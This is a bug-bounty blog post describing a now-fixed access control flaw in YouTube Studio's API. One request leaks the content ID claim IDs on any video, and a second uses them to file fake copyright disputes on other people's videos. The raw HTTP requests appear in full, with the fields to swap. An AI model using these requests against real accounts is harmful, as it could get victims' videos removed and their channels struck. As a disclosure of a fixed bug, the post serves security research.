A Creative Way To Get Someones YouTube Videos Deleted + A Copyright Strike Against Their YouTube Channel

-

Hey All! Welcome back to another blog post of a pretty interesting finding I submitted to Google. Since the last post got such good traction I will probably be posting another one this weekend or next week. Not sure what that type of write up will entail. 

If you read the last post you probably saw how you could utilize a API in Google Classroom to leak other users Google Drive files. Google gave a nice bounty for it and fixed it very quickly. The traction that post received was amazing as well so thank you for that. 

In this post I am going to show you a very interesting finding which could have resulted in you being able to delete another persons YouTube videos and even risk their entire channel getting deleted. 

So lets begin!

First a little bit of background on YouTube and copyright disputes. 

I think most here know YouTube has a copyright process where if you upload a video using another persons music for example a content ID claim is put against your video. Now these are generally harmless and may result in ads appearing on your video for example so the true owner of the material can make some money from it etc.

Lets say a content ID claim is put against your video and you actually own the material in the video. YouTube also has a very nice dispute process you can do. Here is a image they have to show this process:

 

This is a pretty awesome diagram Google provides to show the dispute process. So if you dispute a content ID claim against a YouTube video you uploaded the owner of the actual content gets notified and has a few actions they can perform. If the owner thinks your dispute claim is invalid this is what they can do:

What the claimant can do
  • Release the claim: If the claimant agrees with your dispute, they can release their claim. If you were previously monetizing the video, your monetization settings will be restored automatically when all claims on your video are released. Learn more about monetization during Content ID disputes.
  • Reinstate the claim: If the claimant believes that their claim is still valid, they can reinstate it. This means that your dispute was rejected and the claim stays on your video. You may be eligible to appeal this decision.
  • Submit a takedown request: If the claimant believes that their claim is still valid, they can submit a copyright takedown request. If the takedown request is valid, your video is removed from YouTube and your channel gets a copyright strike. Learn more about options for resolving a copyright strike.
  • Let the claim expire: If the claimant doesn’t respond within 30 days, the claim on your video will expire and be released from your video.

As you can see in the above if you submit a dispute the owner of the material could actually submit an entire take down request of your video which then also results in you getting a copyright strike against your channel. For those that do not know a copy right strike on a YouTube channel is pretty serious. Your channel is at risk for entire deletion. 


The finding:


This particular night when I was doing my research I was testing the YouTube Content Studio here:

https://studio.youtube.com

I was mainly just testing all the different API endpoints to see if anything had missing access control checks. Now the good news is when testing the API to delete someone else's YouTube video I got a access denied error so all was good on that front. 

Now I was wondering if I cant directly delete someones YouTube video or channel what else can I do. How can I bypass this?

Well during my research I ended up finding this API endpoint after I uploaded a video a while ago that had a content ID claim against it:

POST /youtubei/v1/creator/list_creator_received_claims?alt=json&key=AIzaSyBUPetSUmoZL-OhlxA7wSac5XinrygCqMo HTTP/1.1
Host: studio.youtube.com

{"context":{"client":{"clientName":62,"clientVersion":"1.20200105.0.0","hl":"en","gl":"US","experimentsToken":""},"request":{"returnLogEntry":true,"internalExperimentFlags":[{"key":"force_route_innertube_shopping_settings_to_outertube","value":"true"},{"key":"force_live_chat_merchandise_upsell","value":"false"},{"key":"force_route_delete_playlist_to_outertube","value":"false"}]},"clientScreenNonce":"MC41MTczMTA1ODY2MDI3NzMy"},"videoId":"n6c0nOScCCo","criticalRead":false}

In the above request it lists the content ID claims you have received against a video you own. In the bottom you should see this:

 "videoId":"n6c0nOScCCo"

If you replaced the video ID with any other video you could see the content ID claims placed against that video. So this API did not have proper access control checks and allowed you to leak the content ID claims against anyone's videos for example. 

Now when I did this I noticed that I received the claimID in the response. I then wondered how useful knowing the claimID would be. 

I then found this next request when investigating:

POST /youtubei/v1/copyright/submit_claim_dispute?alt=json&key=AIzaSyBUPetSUmoZL-OhlxA7wSac5XinrygCqMo HTTP/1.1
Host: studio.youtube.com

{"claimId":{"claimId":"UK9o_XrpTyM","videoId":"n6c0nOScCCo"},"claimDisputeReason":"CLAIM_DISPUTE_REASON_FAIR_USE","fairUseType":"FAIR_USE_TYPE_PROMOTIONAL","justification":"test","signature":"test","channelId":"UCB1Z_cpKu-5V4ag30cndODQ","context":{"client":{"clientName":62,"clientVersion":"1.20200105.0.0","hl":"en","gl":"US","experimentsToken":""},"request":{"returnLogEntry":true,"internalExperimentFlags":[{"key":"force_route_innertube_shopping_settings_to_outertube","value":"true"},{"key":"force_live_chat_merchandise_upsell","value":"false"},{"key":"force_route_delete_playlist_to_outertube","value":"false"}]},"clientScreenNonce":"MC41MTczMTA1ODY2MDI3NzMy"}}

If you look at this next above request you should see:

{"claimId":{"claimId":"UK9o_XrpTyM","videoId":"n6c0nOScCCo"},"claimDisputeReason":"CLAIM_DISPUTE_REASON_FAIR_USE",

Well I just leaked the claimID for the video in the first request. So now all you need to do is change the claimID to the ID you leaked and the videoID for the video you are targeting.

You now will have fully opened and filed a fake content claim dispute on someone else's entire video. If you then remember the image above the true owner could completely file a response to have your entire video taken down along with a copyright strike. 

So while this did not result in a direct deletion of anyone's YouTube videos this was a creative way that could have done it. 

Here is a video POC:

Once again Google VRP likes music with their videos so please enjoy that as well :)

 


Comments

Post a Comment

Popular posts from this blog

Leaking All Users Google Drive Files

-
Image
 Hey All! Long time no see. I decided to make some new blog posts about some of my top Google findings I have had over the years. I am hoping to write up more of these as kind of a continuous series over the next few weeks so stay tuned. In this new post I am writing up an interesting find I had a few years ago that allowed you to gain access to another users Google Drive files. For those that do not know Google Drive is a file sharing service where you can upload word docs, PDF files, or any file for that matter and share it with other users. If the file is private or not meant to be shared with you then you would receive an access denied error.  Today I am going to show you how it was possible to gain access to someone else's Google Drive files without being granted access to it :).   Before I begin I do want to say the issue is fixed and Google VRP gave a nice bounty for it :D. POC: So before I begin going over this POC I need to explain a little back ground about Google Classro
Read more

Becoming A Super Admin In Someone Elses Gsuite Organization And Taking It Over

-
 Hello All! Long time since I have posted here :) As most of you know I am planning on writing up a lot of my research I have done through Microsoft Bug Bounty program over the years. Still trying to figure out exactly the best approach and reports to writeup. However in the mean time I will be providing some of my research from Google over the years. Microsoft and Google were the 2 main programs I hunted on over the years and Googles program resulted in some fruitful research as well :) So as a result today I present how it was possible to add yourself as a Gsuite Super Admin to someone else's Gsuite account. POC: So for those that do not know Gusite is a suite of products offered by Google for organizations and education institutions for example. It is similar to Microsofts offering of O365. Now in Gsuite the main admins of the organization are super admins. They are exactly what they sound like. Have Super Admin privileges over everything. They can create group, manage users, ch
Read more